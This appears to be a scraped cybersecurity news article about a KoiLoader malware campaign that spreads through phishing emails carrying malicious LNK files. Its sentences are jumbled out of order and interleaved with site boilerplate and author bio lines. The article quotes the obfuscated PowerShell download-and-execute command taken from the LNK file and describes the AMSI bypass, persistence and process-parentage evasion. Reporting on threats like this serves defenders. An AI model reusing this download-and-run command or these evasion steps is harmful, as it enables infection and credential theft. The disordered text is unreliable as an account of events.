This updated strain employs PowerShell scripts embedded within Windows shortcut (LNK) files to bypass traditional detection mechanisms, demonstrating a concerning evolution in attack methodologies. eSentire’s Threat Response Unit (TRU) first detected the intrusion during routine threat-hunting operations, observing the malware’s multi-stage deployment chain designed to evade endpoint detection and response (EDR) tools. The attack begins with a PowerShell command embedded in the LNK file, which downloads two JScript payloads (g1siy9wuiiyxnk.js and i7z1x5npc.js) to establish persistence and execute further malicious activities. The secondary script (i7z1x5npc.js) retrieves the victim’s machine GUID from the registry (HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid), generates a unique filename, and fetches two PowerShell scripts: one to disable AMSI (boomier10qD0.php) and another (nephralgiaMsy.ps1) to load KoiLoader into memory (Figure 5). Cybersecurity researchers identified a sophisticated malware campaign leveraging a new variant of KoiLoader, a modular payload delivery system notorious for distributing information stealers like Koi Stealer. eSentire analysts noted this technique disrupts process ancestry-based detection, as security tools typically associate wscript.exe with user-initiated actions rather than system services. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The malware’s impact extends beyond initial compromise, as KoiLoader facilitates the delivery of Koi Stealer, a C#-based information stealer capable of harvesting credentials, cryptocurrency wallets, and sensitive documents. The first JScript (g1siy9wuiiyxnk.js) deletes the initial scheduled task and relaunches the payload via wscript.exe under svchost.exe to simulate benign activity. The campaign’s initial access vector involves phishing emails impersonating financial institutions, luring victims with ZIP archives containing malicious LNK files labeled as bank statements. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $pdw = $env:programdata + '\' + ('g1siy9wuiiyxnk.js i7z1x5npc'); $getf='Dow'+'nl'+'oadF'+'ile'; $w2al9zb7lb86ccs0 = New-Object Net.WebClient; $wscs = 'wscript '; $w2al9zb7lb86ccs0.$getf(' ;.]it/.../hemigastrectomySDur.php', 'g1siy9wuiiyxnk.js'); . With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Subsequent command-and-control (C2) communications use encrypted HTTP POST requests to exfiltrate victim data, including operating system details, usernames, and domain information. Notably, the threat actors employed scheduled tasks to maintain execution continuity while altering process parentage to mimic legitimate system activity. Organizations are advised to disable wscript.exe via AppLocker, monitor PowerShell execution logs, and deploy behavior-based EDR solutions to mitigate such threats. These files exploit a known Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments, masking their malicious intent during superficial inspection. The infection chain begins when a victim interacts with the LNK file chase_statement_march.lnk, which triggers a truncated PowerShell command. This multi-stage approach highlights adversaries’ increasing sophistication in blending LOLBin abuse, script obfuscation, and encryption to evade detection. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. This campaign shows the growing reliance on living-off-the-land binaries (LOLBins) and script-based attacks to circumvent security controls.
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 02 Apr 2025 05:15:05 +0000